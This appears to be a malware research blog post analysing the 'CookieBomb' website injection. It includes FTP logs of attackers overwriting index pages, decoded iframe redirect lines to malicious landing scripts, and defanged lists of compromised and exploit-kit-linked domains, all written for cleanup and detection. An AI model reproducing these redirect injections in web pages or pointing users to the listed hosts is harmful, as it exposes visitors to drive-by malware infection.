[2013/07/11 21:46:58] xxxxxxxx ATTACKER-IP: C="RETR public_html//index.html" F=/public_html/index.html B=10486 S=226 T=0.199
[2013/07/11 21:46:59] xxxxxxxx ATTACKER-IP: C="STOR public_html//index.html" F=- B=- S=- T=-
[2013/07/11 21:46:59] xxxxxxxx ATTACKER-IP: C="RETR public_html/index.html" F=- B=- S=550 T=-
[2013/07/11 21:47:00] xxxxxxxx ATTACKER-IP: C="RETR public_html/index.html-1" F=/public_html/index.html-1 B=7484 S=226 T=0.189
[2013/07/11 21:47:00] xxxxxxxx ATTACKER-IP: C="STOR public_html/index.html-1" F=- B=- S=- T=-
Webroot was writing good article about these evil tools which is spotted used in the wild in -->>[HERE] and [HERE]

Let's go back to those injected codes. After decoded, all of these scripts came up with the with the below code, I put some explanation on the codes to grab the same perception for further explanation:

The decoded values of redirection stored in the RANDOM_2_TO_4_CHARS are as per below
(in "masked" urls):

xp.src =    'h00p://valtechnologie.com/support/clik.php';
rr.src =    'h00p://toerkoopweb.nl/diensten/count.php';
p.src =     'h00p://abra-pc.com.br/clik.php';
wenr.src =  'h00p://ueno-hiroshima.main.jp/dtd.php';
nj.src =    'h00p://coleychurch.org.uk/www/cnt.php';
c.src =     'h00p://101.110.149.203/clk.php';
y.src =     'h00p://dv-suedpfalz.de/count.php';
kk.src =    'h00p://spendmetest.com/Services/count.php';
fkhd.src =  'h00p://syasinya-san.sakura.ne.jp/dtd.php';
gvb.src =   'h00p://turbolinks.orgfree.com/documentation/cnt.php';
qbvmf.src = 'h00p://taekwondoarirang.com/clik.php';
sfv.src =   'h00p://igrejabatista.comze.com/web_media/counter.php';
idqni.src = 'h00p://www.alle-vier.de/clicker.php';
ydypy.src = 'h00p://igrejabatista.comze.com/web_media/counter.php';
vaasr.src = 'h00p://www.thehornybanana.com/_vti_bin/clicker.php';
gvb.src =   'h00p://turbolinks.orgfree.com/documentation/cnt.php';
gvb.src =   'h00p://turbolinks.orgfree.com/documentation/cnt.php';
qbvmf.src = 'h00p://taekwondoarirang.com/clik.php';
dxbq.src =  'h00p://f2f365.com/counter.php';
qbvmf.src = 'h00p://taekwondoarirang.com/clik.php';
beb.src =   'h00p://avceldiamante.com/clk.php';
wenr.src =  'h00p://ueno-hiroshima.main.jp/dtd.php';
kmqai.src = 'h00p://96.9.52.103/clik.php';
kk.src =    'h00p://spendmetest.com/Services/count.php';
jpp.src =   'h00p://xeropointventures.com/images/rel.php';
nj.src =    'h00p://coleychurch.org.uk/www/cnt.php';
ve.src =    'h00p://alldesign-jp.fool.jp/counter.php';
ydypy.src = 'h00p://igrejabatista.comze.com/web_media/counter.php';
jpp.src =   'h00p://xeropointventures.com/images/rel.php';
udv.src =   'h00p://ueno-hiroshima.main.jp/dtd.php';
So we have the evil php file-names used as the landing of this redirection as; cnt.php, clk.php, click.php, rel.php, dtd.php, counter.php, clicker.php, and so on. The purpose of this file naming is to camouflage its malicious action from the hacked site owners and the infected victims. The problem is if you access this url directly, it will replies you with the "OK" or other values.

So far, during pointing and cleaning these infections , even though I begged to site admins & owners for the injected code at landing page, still I was not that lucky to have these scripts however we finally understanding this malicious concept.

The concept of Cookie Bomb

I called & tagged this as #CookieBomb concept, it works like this:

The code in the template above means: When a cookie-enabled browser accessing these infected sites, the codes will be executed in JavaScript environment to check whether your browser already have a specific cookie and value , if not then that cookie will be created for you. At the same time, no matter you have the cookie or not you will be redirected to the other site via a hidden IFRAME which will replying you the dull response like below pic:

During the creation of the cookie it will be set the specific values of cookie like: 1) the cookie's (file) name, 2) special variable value, 3) the expiry date, and 4) access path. These are four important values needed for the further process.

After the redirection was made, the PHP or (Java, etc) script (masked as those cnt.php, clk.php, click.php, rel.php, dtd.php, counter.php, clicker.php , and so on..) will "suppose" to check the cookie's values and its etc condition with then execute an "action" upon those condition meets which this "action" is never be good. They can execute another redirection, or a straight infection, depends on the needs of the hacker. Is a simple scheme, it works, and it is deploy-able to the mass automation scheme.

The point of the bad guys doing this is: to delay an infection, to avoid detection and alerts, on the other words: This time you need a cookie under some expiry time as "ticket" for an infection that's why I call this as Cookie Bomb.

Proof Of Concept

well, to talk is easy, proving it is another matter, we tried to make as many PoC of the above infection concept, and it works with the simple PHP code below:

Explanation:
The above PoC code is just an example. If a landing page calls the cookie and meets the same condition with the cookie's value of the previously made in injected-code's site then the malware infection or another attack can be performed. In the example I wrote a direct access to an executable malware file, many implementation of this concept can be applied.

Mitigation

To mitigate this infection case, we can search by Google the below keywords (which can be changed easily by the hackers.. so please be flexible in your greps by using regex):

Or scan it to your web site from local server. And if you find it, please decode to find the destination URL target too, for the both sites need to be cleaned from our beloved internet.
Furthermore, to fight this threat, the FTP log is really our friend for we need to know from which IP address the attack was coming, in my case mostly came from Ukrainian network

How to search this infection?

By understanding the characteristic used by this attack is not that difficult to search the infected page. Google Search or Mr. Keith Makan's GooDork is a very good tools for this purpose. Please see how the automation logic that is used to infect, seeing (1) the cookie created path value of "/" and (2) FTP hack log shown above, we know that mostly the top pages (or the file linked to the top pages like framed top/menu or scrip/css called) are aimed with the reason: the wide infection is targeted by these bad actors. We can just grep the infection string used (look at the one of above pic) and aim your dork canon into your target (ISP or Country based Geo-IP) and you will get the result almost instantly. i.e.; While writing this I was aiming the US' ISP GoDaddy and received the below infected domains which are proved infected to these attack:

h00p://mmcmt.org/
h00p://www.wettndry.com/
h00p://gorillarobotfactory.com/
h00p://dcprevisores.com/
h00p://ip-72-167-99-107.ip.secureserver.net/
h00p://syccoservices.com/
h00p://cdijescolhacerta.casabmse.pt/
h00p://www.iimspublications.com/
h00p://www.shaversandrazor.com/
h00p://www.newlooklaser.ca/
h00p://www.smartageinsurance.com/
h00p://www.jumpshotmedia.com/
h00p://www.wolfetech.com/
h00p://bracapulco.com/
h00p://www.naturalbalancenow.com/
h00p://www.ishojtv.com/
h00p://www.sensorsadvance.com/
h00p://www.newlooklaser.ca/
h00p://bracapulco.com/
h00p://mosaicnarrative.com/
h00p://westonflmovers.com/
h00p://www.1stpagemarketingservices.com/
h00p://2528c.com/
h00p://starlighthca.com/
h00p://billymorganart.com/
h00p://flyxilla.com/
h00p://thinkingknowledge.com/
h00p://www.angelavanegas.com/
h00p://sportingdelights.com/
h00p://scholarlythinking.com/
h00p://limeworks.org/blog/wp-includes/js/comment-repl%3D/
[...]
(some of ↑these may lead to Blackhole Exploit Kit, all are infected w/redir)

Samples

We share the sample injection codes, the decode and PoC to be downloaded from-->>[HERE] for the research purpose and raising the detection ratio of this attack.

Additional

The recent changes in obfuscation (or etc changes) for this attack will be posted in this page-->>[Blog]

This post is dedicated to fellow admins, fellow IR officers who have to work non-stop to clean this threat, and special thank's to our crusader for his great help in proving the concept.

#MalwareMustDie!